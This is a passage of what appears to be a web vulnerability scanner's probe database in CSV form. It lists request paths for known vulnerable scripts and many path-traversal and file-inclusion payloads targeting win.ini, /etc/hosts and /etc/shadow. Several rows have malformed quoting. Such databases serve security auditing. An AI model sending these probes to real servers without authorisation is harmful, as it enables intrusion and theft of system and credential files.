scanner.\",\"\",\"\"\n\"002269\",\"\",\"1\",\"/add_acl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002270\",\"\",\"1\",\"/admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=hosts&amp;rid=1&amp;S=[someid]\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002271\",\"\",\"1\",\"/admin/auth.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002272\",\"\",\"1\",\"/admin/cfg/configscreen.inc.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002273\",\"\",\"1\",\"/admin/cfg/configsite.inc.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002274\",\"\",\"1\",\"/admin/cfg/configsql.inc.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002275\",\"\",\"1\",\"/admin/cfg/configtache.inc.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002276\",\"\",\"1\",\"/admin/cms/htmltags.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002277\",\"\",\"1\",\"/admin/credit_card_info.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002278\",\"\",\"1\",\"/admin/exec.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002279\",\"\",\"1\",\"/admin/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002280\",\"\",\"1\",\"/admin/modules/cache.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002281\",\"\",\"1\",\"/admin/objects.inc.php4\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002282\",\"\",\"1\",\"/admin/script.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002283\",\"\",\"1\",\"/admin/settings.inc.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002284\",\"\",\"1\",\"/admin/templates/header.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002285\",\"\",\"1\",\"/admin/upload.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002286\",\"\",\"1\",\"/admin_t/include/aff_liste_langue.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002287\",\"\",\"1\",\"/adv/gm001-mc/\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002288\",\"\",\"1\",\"/aff_news.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002289\",\"\",\"1\",\"/approval/ts_app.htm\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002290\",\"\",\"1\",\"/archive.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002291\",\"\",\"1\",\"/archive_forum.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002292\",\"\",\"1\",\"/ashnews.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002293\",\"\",\"1\",\"/auth.inc.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002294\",\"\",\"1\",\"/b2-tools/gm-2-b2.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002295\",\"\",\"1\",\"/bandwidth/index.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002296\",\"\",\"1\",\"/basilix.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002297\",\"\",\"1\",\"/bigsam_guestbook.php?displayBegin=9999...9999\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002298\",\"\",\"1\",\"/bin/common/user_update_passwd.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002299\",\"\",\"1\",\"/biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002300\",\"\",\"1\",\"/biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002301\",\"\",\"1\",\"/board/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002302\",\"\",\"1\",\"/board/philboard_admin.asp+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002303\",\"\",\"1\",\"/boilerplate.asp?NFuse_Template=../../Windows/win.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002304\",\"\",\"1\",\"/bugtest+/+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002305\",\"\",\"1\",\"/caupo/admin/admin_workspace.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002306\",\"\",\"1\",\"/ccbill/whereami.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002307\",\"\",\"1\",\"/chat_dir/register.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002308\",\"\",\"1\",\"/checkout_payment.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002309\",\"\",\"1\",\"/communique.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002310\",\"\",\"1\",\"/community/forumdisplay.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002311\",\"\",\"1\",\"/community/index.php?analized=anything\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002312\",\"\",\"1\",\"/community/member.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002313\",\"\",\"1\",\"/compte.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002314\",\"\",\"1\",\"/config/html/cnf_gi.htm\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002315\",\"\",\"1\",\"/convert-date.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002316\",\"\",\"1\",\"/cp/rac/nsManager.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002317\",\"\",\"3a\",\"/CSNews.cgi?command=viewnews&database=none\",\"GET\",\"BODY:ENV\",\"csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.\",\"\",\"\"\n\"002318\",\"\",\"1\",\"/csPassword.cgi?command=remove%20\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002319\",\"\",\"1\",\"/cutenews/comments.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002320\",\"\",\"1\",\"/cutenews/search.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002321\",\"\",\"1\",\"/cutenews/shownews.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002322\",\"\",\"1\",\"/Data/settings.xml+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002323\",\"\",\"1\",\"/database/metacart.mdb+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002324\",\"\",\"1\",\"/db.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002325\",\"\",\"1\",\"/dbabble\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002326\",\"\",\"1\",\"/dcp/advertiser.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002327\",\"\",\"1\",\"/defines.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002328\",\"\",\"1\",\"/dltclnt.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002329\",\"\",\"1\",\"/doc/admin/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002330\",\"\",\"1\",\"/docs/NED\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002331\",\"\",\"1\",\"/dotproject/modules/files/index_table.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002332\",\"\",\"1\",\"/dotproject/modules/projects/addedit.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002333\",\"\",\"1\",\"/dotproject/modules/projects/view.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002334\",\"\",\"1\",\"/dotproject/modules/projects/vw_files.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002335\",\"\",\"1\",\"/dotproject/modules/tasks/addedit.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002336\",\"\",\"1\",\"/dotproject/modules/tasks/viewgantt.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002337\",\"\",\"1\",\"/do_map\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002338\",\"\",\"1\",\"/do_subscribe\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002339\",\"\",\"1\",\"/email.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002340\",\"\",\"1\",\"/emml_email_func.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002341\",\"\",\"1\",\"/emumail.cgi?type=.%00\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002342\",\"\",\"1\",\"/entete.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002343\",\"\",\"1\",\"/enteteacceuil.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002344\",\"\",\"1\",\"/etc/shadow+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002345\",\"\",\"1\",\"/eventcal2.php.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002346\",\"\",\"1\",\"/ez2000/ezadmin.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002347\",\"\",\"1\",\"/ez2000/ezboard.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002348\",\"\",\"1\",\"/ez2000/ezman.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002349\",\"\",\"1\",\"/faqman/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002350\",\"\",\"1\",\"/filemanager/index.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002351\",\"\",\"1\",\"/filemgmt/brokenfile.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002352\",\"\",\"1\",\"/filemgmt/singlefile.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002353\",\"\",\"1\",\"/filemgmt/viewcat.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002354\",\"\",\"1\",\"/filemgmt/visit.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002355\",\"\",\"1\",\"/foro/YaBB.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002356\",\"\",\"1\",\"/forum-ra.asp?n=....//....//....//....//....//....//..../@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002357\",\"\",\"1\",\"/forum-ra.asp?n=../../../../../../../../..@LFI(abs)\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002358\",\"\",\"1\",\"/forum-ra.asp?n=../../../../../../../../..@LFI(abs)%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002360\",\"\",\"1\",\"/forum-ra.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002361\",\"\",\"1\",\"/forum-ra.asp?n=@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002362\",\"\",\"1\",\"/forum-ra.asp?n=@LFI(abs)%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002364\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=%60@LFI(abs)%60\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002365\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=@LFI()%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002366\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=@LFI()\",\"GET\",\"@LFI(),\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002367\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=/....../@LFI(abs,win)\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002368\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002369\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=/@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002371\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./@LFI(abs,win)\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002372\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002374\",\"\",\"1\",\"/forum-ra_professionnel.asp?n=c:\\@LFI(abs,win)\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002375\",\"\",\"1\",\"/forum.asp?n=%60@LFI(abs)%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002376\",\"\",\"1\",\"/forum.asp?n=@LFI()%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002377\",\"\",\"1\",\"/forum.asp?n=../../Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002378\",\"\",\"1\",\"/forum.asp?n=/....../Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002379\",\"\",\"1\",\"/forum.asp?n=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002380\",\"\",\"1\",\"/forum.asp?n=/@LFI()|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002382\",\"\",\"1\",\"/forum.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002383\",\"\",\"1\",\"/forum.asp?n=@LFI(abs)%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002384\",\"\",\"1\",\"/forum.asp?n=@LFI(abs)|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002386\",\"\",\"1\",\"/forum/mainfile.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002387\",\"\",\"1\",\"/forum/member.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002388\",\"\",\"1\",\"/forum/newreply.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002389\",\"\",\"1\",\"/forum/newthread.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002390\",\"\",\"b\",\"/forum/viewtopic.php\",\"GET\",\"CODE:200\",\"phpBB found.\",\"\",\"\"\n\"002391\",\"\",\"1\",\"/forum1.asp?n=%60@LFI(abs)60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002392\",\"\",\"1\",\"/forum1.asp?n=....//....//....//....//....//....//....//etc.hosts&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002393\",\"\",\"1\",\"/forum1.asp?n=@LFI()%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002395\",\"\",\"1\",\"/forum1.asp?n=/....../@LFI(abs)&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI(),\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002396\",\"\",\"1\",\"/forum1.asp?n=@LFI()&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI(),\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002397\",\"\",\"1\",\"/forum1.asp?n=/@LFI(abs)&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002399\",\"\",\"1\",\"/forum1.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002402\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=%60@LFI(abs)%60\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002403\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.hosts\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002404\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002405\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=@LFI()%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002406\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=/....../Windows/win.i\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002407\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=/..../Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002409\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002411\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=@LFI(abs)%00\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002412\",\"\",\"1\",\"/forum1.asp?n=1753&amp;nn=@LFI(abs)\",\"GET\",\"@LFI(),\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002413\",\"\",\"1\",\"/forum1.asp?n=@LFI(abs)&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002414\",\"\",\"1\",\"/forum1_professionnel.asp?n=%60@LFI()%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002415\",\"\",\"1\",\"/forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.hosts&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002416\",\"\",\"1\",\"/forum1_professionnel.asp?n=@LFI()%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002417\",\"\",\"1\",\"/forum1_professionnel.asp?n=/....../Windows/win.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002418\",\"\",\"1\",\"/forum1_professionnel.asp?n=/.../.../.../.../.../.../Windows/win.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002419\",\"\",\"1\",\"/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002420\",\"\",\"1\",\"/forum1_professionnel.asp?n=/@LFI()&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002421\",\"\",\"1\",\"/forum1_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002423\",\"\",\"1\",\"/forum1_professionnel.asp?n=@LFI()&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002424\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=%60@LFI()%60&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002425\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.hosts&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002426\",\"\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=@LFI()%00&amp;page=1\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown 